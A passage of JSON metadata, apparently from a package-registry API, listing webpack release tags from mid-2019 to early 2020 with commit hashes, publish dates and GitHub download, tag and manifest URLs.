caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosys